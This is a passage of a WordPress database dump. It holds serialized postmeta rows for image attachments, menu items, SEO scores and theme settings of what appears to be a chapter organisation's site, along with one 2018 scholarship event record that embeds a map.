s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4795,1259,'_wp_attached_file','2017/12/CalendarThumbnail.png'),(4796,1259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:29:\"2017/12/CalendarThumbnail.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"CalendarThumbnail-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:29:\"CalendarThumbnail-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"CalendarThumbnail-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4807,1261,'_wp_attached_file','2016/11/APPACalendar-1.png'),(4808,1261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:26:\"2016/11/APPACalendar-1.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"APPACalendar-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"APPACalendar-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"APPACalendar-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4812,493,'ts-social-twitter','1'),(4813,1264,'_wp_attached_file','2018/01/2017ChapterLOGO.png'),(4814,1264,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1614;s:6:\"height\";i:1614;s:4:\"file\";s:27:\"2018/01/2017ChapterLOGO.png\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"2017ChapterLOGO-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"2017ChapterLOGO-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4817,1269,'_wp_attached_file','2018/03/HowardCountyLogoCalendar.png'),(4818,1269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:36:\"2018/03/HowardCountyLogoCalendar.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"HowardCountyLogoCalendar-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:36:\"HowardCountyLogoCalendar-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"HowardCountyLogoCalendar-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4835,1271,'_wp_attached_file','2017/03/MSWALKCalendarImage.png'),(4836,1271,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:31:\"2017/03/MSWALKCalendarImage.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"MSWALKCalendarImage-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:31:\"MSWALKCalendarImage-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"MSWALKCalendarImage-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4840,1273,'_wp_attached_file','2017/02/MarchofDimesButton-1.png'),(4841,1273,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:32:\"2017/02/MarchofDimesButton-1.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"MarchofDimesButton-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:32:\"MarchofDimesButton-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"MarchofDimesButton-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4852,1276,'_wp_attached_file','2018/05/Introducing-Spring-2018.png'),(4853,1276,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:933;s:4:\"file\";s:35:\"2018/05/Introducing-Spring-2018.png\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"Introducing-Spring-2018-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"Introducing-Spring-2018-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-600x400.png\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-600x400.png\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"Introducing-Spring-2018-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4854,1277,'_wp_attached_file','2018/05/Chapter.png'),(4855,1277,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:933;s:4:\"file\";s:19:\"2018/05/Chapter.png\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Chapter-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Chapter-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Chapter-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Chapter-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"Chapter-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:19:\"Chapter-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:19:\"Chapter-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Chapter-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"Chapter-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"Chapter-600x400.png\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"Chapter-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"Chapter-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"Chapter-600x400.png\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Chapter-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4856,1278,'_wp_attached_file','2018/05/Award.png'),(4857,1278,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1400;s:6:\"height\";i:933;s:4:\"file\";s:17:\"2018/05/Award.png\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Award-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Award-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"Award-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"Award-1024x682.png\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"Award-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:17:\"Award-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:17:\"Award-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"Award-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:17:\"Award-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:17:\"Award-600x400.png\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"Award-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"Award-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"Award-600x400.png\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"Award-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4881,1281,'_wp_attached_file','2018/06/EC_Calendar.png'),(4882,1281,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:23:\"2018/06/EC_Calendar.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"EC_Calendar-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:23:\"EC_Calendar-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"EC_Calendar-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"EC_Calendar-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5197,1313,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(5196,1313,'ts_sidebar','a:3:{s:8:\"position\";s:4:\"none\";s:4:\"size\";s:3:\"1-3\";s:2:\"id\";i:0;}'),(5195,1313,'_yoast_wpseo_content_score','30'),(5192,1314,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1376;s:6:\"height\";i:650;s:4:\"file\";s:29:\"2018/09/ChapterMembership.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"ChapterMembership-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"ChapterMembership-300x142.png\";s:5:\"width\";i:300;s:6:\"height\";i:142;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"ChapterMembership-768x363.png\";s:5:\"width\";i:768;s:6:\"height\";i:363;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"ChapterMembership-1024x484.png\";s:5:\"width\";i:1024;s:6:\"height\";i:484;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:29:\"ChapterMembership-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:29:\"ChapterMembership-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:29:\"ChapterMembership-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:29:\"ChapterMembership-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5191,1314,'_wp_attached_file','2018/09/ChapterMembership.png'),(5181,1309,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(5179,1309,'_yoast_wpseo_primary_event_categories','55'),(5178,1309,'_yoast_wpseo_content_score','90'),(5167,1298,'page_settings',NULL),(5161,1298,'event','a:13:{s:3:\"day\";s:10:\"2018-10-09\";s:10:\"start-time\";s:7:\"7:00 PM\";s:8:\"end-time\";s:7:\"8:00 PM\";s:19:\"event-enable-repeat\";s:1:\"n\";s:9:\"event-end\";s:10:\"2019-10-09\";s:12:\"event-repeat\";s:1:\"1\";s:5:\"theme\";s:0:\"\";s:6:\"person\";s:25:\"scholarships@zphiblgz.org\";s:3:\"map\";s:361:\"<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3091.270928536212!2d-76.88161498492022!3d39.21401213582447!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89b7df0c122c5409%3A0x1efe22dcab74062b!2sHoward+Community+College!5e0!3m2!1sen!2sus!4v1536980867240\" width=\"600\" height=\"450\" frameborder=\"0\" style=\"border:0\" allowfullscreen></iframe>\";s:9:\"free-paid\";s:4:\"free\";s:10:\"ticket-url\";s:0:\"\";s:5:\"price\";s:0:\"\";s:5:\"venue\";s:74:\"Howard Community College - Columbia, MD (Health Science Building Room 163)\";}'),(5160,1298,'_thumbnail_id','1299'),(5159,1298,'ts_template','a:0:{}'),(5075,1294,'_wp_attached_file','2018/09/NewSizeAward.png'),(5074,1293,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:650;s:4:\"file\";s:27:\"2018/09/ExecutiveResize.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"ExecutiveResize-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"ExecutiveResize-300x102.png\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"ExecutiveResize-768x260.png\";s:5:\"width\";i:768;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"ExecutiveResize-1024x347.png\";s:5:\"width\";i:1024;s:6:\"height\";i:347;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"ExecutiveResize-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:27:\"ExecutiveResize-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:27:\"ExecutiveResize-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"ExecutiveResize-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5071,1292,'_wp_attached_file','2018/09/Proclamation.png'),(5058,1287,'_menu_item_type','custom'),(5059,1287,'_menu_item_menu_item_parent','0'),(5060,1287,'_menu_item_object_id','1287'),(5061,1287,'_menu_item_object','custom'),(5062,1287,'_menu_item_target',''),(5063,1287,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5064,1287,'_menu_item_xfn',''),(5065,1287,'_menu_item_url',''),(5067,1288,'ts_use_template','0'),(5068,1288,'_edit_lock','1536994196:1'),(5069,1288,'_edit_last','1'),(5070,1288,'ts_template','a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0